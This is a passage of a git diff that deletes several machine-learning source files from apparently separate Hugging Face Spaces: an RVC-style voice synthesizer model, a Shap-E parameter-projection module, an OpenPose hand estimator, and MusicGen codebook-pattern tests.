- ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMs256NSFsid(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward( - self, phone, phone_lengths, pitch, pitchf, y, y_lengths, ds - ): # 这里ds是id,[bs,1] - # print(1,pitch.shape)#[bs,t] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - # print(-1,pitchf.shape,ids_slice,self.segment_size,self.hop_length,self.segment_size//self.hop_length) - pitchf = commons.slice_segments2(pitchf, ids_slice, self.segment_size) - # print(-2,pitchf.shape,z_slice.shape) - o = self.dec(z_slice, pitchf, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, pitch, nsff0, sid, max_len=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], nsff0, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs256NSFsid_nono(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr=None, - **kwargs - ): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=False, - ) - self.dec = Generator( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward(self, phone, phone_lengths, y, y_lengths, ds): # 这里ds是id,[bs,1] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - o = self.dec(z_slice, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, sid, max_len=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs256NSFsid_sim(nn.Module): - """ - Synthesizer for Training - """ - - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - # hop_length, - gin_channels=0, - use_sdp=True, - **kwargs - ): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256Sim( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - is_half=kwargs["is_half"], - ) - - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward( - self, phone, phone_lengths, pitch, pitchf, y_lengths, ds - ): # y是spec不需要了现在 - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - x, x_mask = self.enc_p(phone, pitch, phone_lengths) - x = self.flow(x, x_mask, g=g, reverse=True) - z_slice, ids_slice = commons.rand_slice_segments( - x, y_lengths, self.segment_size - ) - - pitchf = commons.slice_segments2(pitchf, ids_slice, self.segment_size) - o = self.dec(z_slice, pitchf, g=g) - return o, ids_slice - - def infer( - self, phone, phone_lengths, pitch, pitchf, ds, max_len=None - ): # y是spec不需要了现在 - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - x, x_mask = self.enc_p(phone, pitch, phone_lengths) - x = self.flow(x, x_mask, g=g, reverse=True) - o = self.dec((x * x_mask)[:, :, :max_len], pitchf, g=g) - return o, o - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/vishnu0001/text2mesh/shap_e/models/transmitter/params_proj.py b/spaces/vishnu0001/text2mesh/shap_e/models/transmitter/params_proj.py deleted file mode 100644 index 11b3fd869ecf23cf66bc8edbedc98d8c22dfcfd9..0000000000000000000000000000000000000000 --- a/spaces/vishnu0001/text2mesh/shap_e/models/transmitter/params_proj.py +++ /dev/null @@ -1,197 +0,0 @@ -import math -from abc import ABC, abstractmethod -from collections import OrderedDict -from typing import Any, Dict, Optional, Tuple - -import numpy as np -import torch.nn as nn -from torch import torch - -from shap_e.util.collections import AttrDict - - -def flatten_param_shapes(param_shapes: Dict[str, Tuple[int]]): - flat_shapes = OrderedDict( - (name, (int(np.prod(shape)) // shape[-1], shape[-1])) - for name, shape in param_shapes.items() - ) - return flat_shapes - - -class ParamsProj(nn.Module, ABC): - def __init__(self, *, device: torch.device, param_shapes: Dict[str, Tuple[int]], d_latent: int): - super().__init__() - self.device = device - self.param_shapes = param_shapes - self.d_latent = d_latent - - @abstractmethod - def forward(self, x: torch.Tensor, options: Optional[AttrDict] = None) -> AttrDict: - pass - - -class LinearParamsProj(ParamsProj): - def __init__( - self, - *, - device: torch.device, - param_shapes: Dict[str, Tuple[int]], - d_latent: int, - init_scale: Optional[float] = None, - ): - super().__init__(device=device, param_shapes=param_shapes, d_latent=d_latent) - self.param_shapes = param_shapes - self.projections = nn.ModuleDict({}) - for k, v in param_shapes.items(): - self.projections[_sanitize_name(k)] = nn.Linear( - d_latent, int(np.prod(v)), device=device - ) - if init_scale is not None: - scale = init_scale / math.sqrt(d_latent) - mod = self.projections[_sanitize_name(k)] - nn.init.normal_(mod.weight, std=scale) - nn.init.zeros_(mod.bias) - - def forward(self, x: torch.Tensor, options: Optional[AttrDict] = None) -> AttrDict: - out = AttrDict() - for k in self.param_shapes.keys(): - proj = self.projections[_sanitize_name(k)] - out[k] = proj(x).reshape([len(x), *self.param_shapes[k]]) - return out - - -class MLPParamsProj(ParamsProj): - def __init__( - self, - *, - device: torch.device, - param_shapes: Dict[str, Tuple[int]], - d_latent: int, - hidden_size: Optional[int] = None, - ): - super().__init__(device=device, param_shapes=param_shapes, d_latent=d_latent) - if hidden_size is None: - hidden_size = d_latent - self.param_shapes = param_shapes - self.projections = nn.ModuleDict({}) - for k, v in param_shapes.items(): - self.projections[_sanitize_name(k)] = nn.Sequential( - nn.Linear(d_latent, hidden_size, device=device), - nn.GELU(), - nn.Linear(hidden_size, int(np.prod(v)), device=device), - ) - - def forward(self, x: torch.Tensor, options: Optional[AttrDict] = None) -> AttrDict: - out = AttrDict() - for k in self.param_shapes.keys(): - proj = self.projections[_sanitize_name(k)] - out[k] = proj(x).reshape([len(x), *self.param_shapes[k]]) - return out - - -class ChannelsProj(nn.Module): - def __init__( - self, - *, - device: torch.device, - vectors: int, - channels: int, - d_latent: int, - init_scale: float = 1.0, - learned_scale: Optional[float] = None, - use_ln: bool = False, - ): - super().__init__() - self.proj = nn.Linear(d_latent, vectors * channels, device=device) - self.use_ln = use_ln - self.learned_scale = learned_scale - if use_ln: - self.norm = nn.LayerNorm(normalized_shape=(channels,), device=device) - if learned_scale is not None: - self.norm.weight.data.fill_(learned_scale) - scale = init_scale / math.sqrt(d_latent) - elif learned_scale is not None: - gain = torch.ones((channels,), device=device) * learned_scale - self.register_parameter("gain", nn.Parameter(gain)) - scale = init_scale / math.sqrt(d_latent) - else: - scale = init_scale / math.sqrt(d_latent * channels) - nn.init.normal_(self.proj.weight, std=scale) - nn.init.zeros_(self.proj.bias) - self.d_latent = d_latent - self.vectors = vectors - self.channels = channels - - def forward(self, x: torch.Tensor) -> torch.Tensor: - x_bvd = x - w_vcd = self.proj.weight.view(self.vectors, self.channels, self.d_latent) - b_vc = self.proj.bias.view(1, self.vectors, self.channels) - h = torch.einsum("bvd,vcd->bvc", x_bvd, w_vcd) - if self.use_ln: - h = self.norm(h) - elif self.learned_scale is not None: - h = h * self.gain.view(1, 1, -1) - h = h + b_vc - return h - - -class ChannelsParamsProj(ParamsProj): - def __init__( - self, - *, - device: torch.device, - param_shapes: Dict[str, Tuple[int]], - d_latent: int, - init_scale: float = 1.0, - learned_scale: Optional[float] = None, - use_ln: bool = False, - ): - super().__init__(device=device, param_shapes=param_shapes, d_latent=d_latent) - self.param_shapes = param_shapes - self.projections = nn.ModuleDict({}) - self.flat_shapes = flatten_param_shapes(param_shapes) - self.learned_scale = learned_scale - self.use_ln = use_ln - for k, (vectors, channels) in self.flat_shapes.items(): - self.projections[_sanitize_name(k)] = ChannelsProj( - device=device, - vectors=vectors, - channels=channels, - d_latent=d_latent, - init_scale=init_scale, - learned_scale=learned_scale, - use_ln=use_ln, - ) - - def forward(self, x: torch.Tensor, options: Optional[AttrDict] = None) -> AttrDict: - out = AttrDict() - start = 0 - for k, shape in self.param_shapes.items(): - vectors, _ = self.flat_shapes[k] - end = start + vectors - x_bvd = x[:, start:end] - out[k] = self.projections[_sanitize_name(k)](x_bvd).reshape(len(x), *shape) - start = end - return out - - -def params_proj_from_config( - config: Dict[str, Any], device: torch.device, param_shapes: Dict[str, Tuple[int]], d_latent: int -): - name = config.pop("name") - if name == "linear": - return LinearParamsProj( - **config, device=device, param_shapes=param_shapes, d_latent=d_latent - ) - elif name == "mlp": - return MLPParamsProj(**config, device=device, param_shapes=param_shapes, d_latent=d_latent) - elif name == "channels": - return ChannelsParamsProj( - **config, device=device, param_shapes=param_shapes, d_latent=d_latent - ) - else: - raise ValueError(f"unknown params proj: {name}") - - -def _sanitize_name(x: str) -> str: - return x.replace(".", "__") diff --git a/spaces/vumichien/canvas_controlnet/annotator/openpose/hand.py b/spaces/vumichien/canvas_controlnet/annotator/openpose/hand.py deleted file mode 100644 index 3d0bf17165ad7eb225332b51f4a2aa16718664b2..0000000000000000000000000000000000000000 --- a/spaces/vumichien/canvas_controlnet/annotator/openpose/hand.py +++ /dev/null @@ -1,86 +0,0 @@ -import cv2 -import json -import numpy as np -import math -import time -from scipy.ndimage.filters import gaussian_filter -import matplotlib.pyplot as plt -import matplotlib -import torch -from skimage.measure import label - -from .model import handpose_model -from . import util - -class Hand(object): - def __init__(self, model_path): - self.model = handpose_model() - if torch.cuda.is_available(): - self.model = self.model.cuda() - print('cuda') - model_dict = util.transfer(self.model, torch.load(model_path)) - self.model.load_state_dict(model_dict) - self.model.eval() - - def __call__(self, oriImg): - scale_search = [0.5, 1.0, 1.5, 2.0] - # scale_search = [0.5] - boxsize = 368 - stride = 8 - padValue = 128 - thre = 0.05 - multiplier = [x * boxsize / oriImg.shape[0] for x in scale_search] - heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 22)) - # paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38)) - - for m in range(len(multiplier)): - scale = multiplier[m] - imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC) - imageToTest_padded, pad = util.padRightDownCorner(imageToTest, stride, padValue) - im = np.transpose(np.float32(imageToTest_padded[:, :, :, np.newaxis]), (3, 2, 0, 1)) / 256 - 0.5 - im = np.ascontiguousarray(im) - - data = torch.from_numpy(im).float() - if torch.cuda.is_available(): - data = data.cuda() - # data = data.permute([2, 0, 1]).unsqueeze(0).float() - with torch.no_grad(): - output = self.model(data).cpu().numpy() - # output = self.model(data).numpy()q - - # extract outputs, resize, and remove padding - heatmap = np.transpose(np.squeeze(output), (1, 2, 0)) # output 1 is heatmaps - heatmap = cv2.resize(heatmap, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC) - heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :] - heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC) - - heatmap_avg += heatmap / len(multiplier) - - all_peaks = [] - for part in range(21): - map_ori = heatmap_avg[:, :, part] - one_heatmap = gaussian_filter(map_ori, sigma=3) - binary = np.ascontiguousarray(one_heatmap > thre, dtype=np.uint8) - # 全部小于阈值 - if np.sum(binary) == 0: - all_peaks.append([0, 0]) - continue - label_img, label_numbers = label(binary, return_num=True, connectivity=binary.ndim) - max_index = np.argmax([np.sum(map_ori[label_img == i]) for i in range(1, label_numbers + 1)]) + 1 - label_img[label_img != max_index] = 0 - map_ori[label_img == 0] = 0 - - y, x = util.npmax(map_ori) - all_peaks.append([x, y]) - return np.array(all_peaks) - -if __name__ == "__main__": - hand_estimation = Hand('../model/hand_pose_model.pth') - - # test_image = '../images/hand.jpg' - test_image = '../images/hand.jpg' - oriImg = cv2.imread(test_image) # B,G,R order - peaks = hand_estimation(oriImg) - canvas = util.draw_handpose(oriImg, peaks, True) - cv2.imshow('', canvas) - cv2.waitKey(0) \ No newline at end of file diff --git a/spaces/w1zrd/MusicGen/tests/modules/test_codebooks_patterns.py b/spaces/w1zrd/MusicGen/tests/modules/test_codebooks_patterns.py deleted file mode 100644 index b658f4779a369f9ec8dde692a61b7f0fe3485724..0000000000000000000000000000000000000000 --- a/spaces/w1zrd/MusicGen/tests/modules/test_codebooks_patterns.py +++ /dev/null @@ -1,246 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import pytest -import torch - -from audiocraft.modules.codebooks_patterns import ( - DelayedPatternProvider, - ParallelPatternProvider, - Pattern, - UnrolledPatternProvider, -) - - -class TestParallelPatternProvider: - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [0, 1, 16, 100]) - def test_get_pattern(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - # + 1 to account for 1st step - assert len(pattern.layout) == timesteps + 1 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_content(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - for s, v in enumerate(pattern.layout): - for i, code in enumerate(v): - assert i == code.q - assert code.t == s - 1 # account for the 1st empty step - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_max_delay(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == 0 - assert len(pattern.valid_layout) == len(pattern.layout) - pattern.max_delay - - -class TestDelayedPatternProvider: - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [0, 1, 16, 100]) - def test_get_pattern(self, n_q: int, timesteps: int): - delays = [ - list(range(n_q)), - [0] + [1] * (n_q - 1), - [0] + [4] * (n_q - 1), - ] - for delay in delays: - provider = DelayedPatternProvider(n_q, delay) - pattern = provider.get_pattern(timesteps) - # + 1 to account for 1st step - assert len(pattern.layout) == timesteps + max(delay) + 1 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_content(self, n_q: int, timesteps: int): - provider = DelayedPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - for s, v in enumerate(pattern.layout): - for i, code in enumerate(v): - assert i == code.q - assert code.t == max(0, s - code.q - 1) - - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - @pytest.mark.parametrize("delay", [[0, 1, 2, 3], [0, 1, 1, 1], [0, 3, 3, 3], [0, 3]]) - def test_pattern_max_delay(self, timesteps: int, delay: list): - provider = DelayedPatternProvider(len(delay), delay) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == max(delay) - assert len(pattern.valid_layout) == len(pattern.layout) - pattern.max_delay - - -class TestUnrolledPatternProvider: - - @pytest.mark.parametrize("timesteps", [0, 1, 16]) - @pytest.mark.parametrize("flattening", [[0, 1, 2], [0, 1, 1]]) - @pytest.mark.parametrize("delays", [[0, 0, 0], [0, 5, 5]]) - def test_get_pattern(self, timesteps: int, flattening: list, delays: list): - n_q = len(flattening) - max_delay = max(delays) - provider = UnrolledPatternProvider(n_q, flattening, delays) - pattern = provider.get_pattern(timesteps) - assert len(pattern.layout) == provider.num_virtual_steps(timesteps) + max_delay - - @pytest.mark.parametrize("timesteps", [0, 1, 16]) - @pytest.mark.parametrize("flattening", [[0, 1, 2], [0, 1, 1]]) - @pytest.mark.parametrize("delays", [[0, 0, 0], [0, 5, 5]]) - def test_pattern_max_delay(self, timesteps: int, flattening: list, delays: list): - n_q = len(flattening) - max_delay = max(delays) - provider = UnrolledPatternProvider(n_q, flattening, delays) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == max_delay - - -class TestPattern: - - def ref_build_pattern_sequence(self, z: torch.Tensor, pattern: Pattern, special_token: int): - """Reference method to build the sequence from the pattern without using fancy scatter.""" - bs, n_q, T = z.shape - z = z.cpu().numpy() - assert n_q == pattern.n_q - assert T <= pattern.timesteps - inp = torch.full((bs, n_q, len(pattern.layout)), special_token, dtype=torch.long).numpy() - inp[:] = special_token - for s, v in enumerate(pattern.layout): - for (t, q) in v: - if t < T: - inp[:, q, s] = z[:, q, t] - return torch.from_numpy(inp) - - def ref_revert_pattern_sequence(self, z: torch.Tensor, pattern: Pattern, special_token: int): - """Reference method to revert the sequence from the pattern without using fancy scatter.""" - z = z.cpu().numpy() - bs, n_q, S = z.shape - assert pattern.n_q == n_q - inp = torch.full((bs, pattern.n_q, pattern.timesteps), special_token, dtype=torch.long).numpy() - inp[:] = special_token - for s, v in enumerate(pattern.layout): - for (t, q) in v: - if t < pattern.timesteps: - inp[:, q, t] = z[:, q, s] - return torch.from_numpy(inp) - - def ref_revert_pattern_logits(self, z: torch.Tensor, pattern: Pattern, special_token: float): - """Reference method to revert the logits from the pattern without using fancy scatter.""" - z = z.cpu().numpy() - bs, card, n_q, S = z.shape - assert pattern.n_q == n_q - ref_layout = pattern.layout - inp = torch.full((bs, card, pattern.n_q, pattern.timesteps), special_token, dtype=torch.float).numpy() - inp[:] = special_token - for s, v in enumerate(ref_layout[1:]): - if s < S: - for (t, q) in v: - if t < pattern.timesteps: - inp[:, :, q, t] = z[:, :, q, s] - return torch.from_numpy(inp) - - def _get_pattern_providers(self, n_q: int): - pattern_provider_1 = ParallelPatternProvider(n_q) - 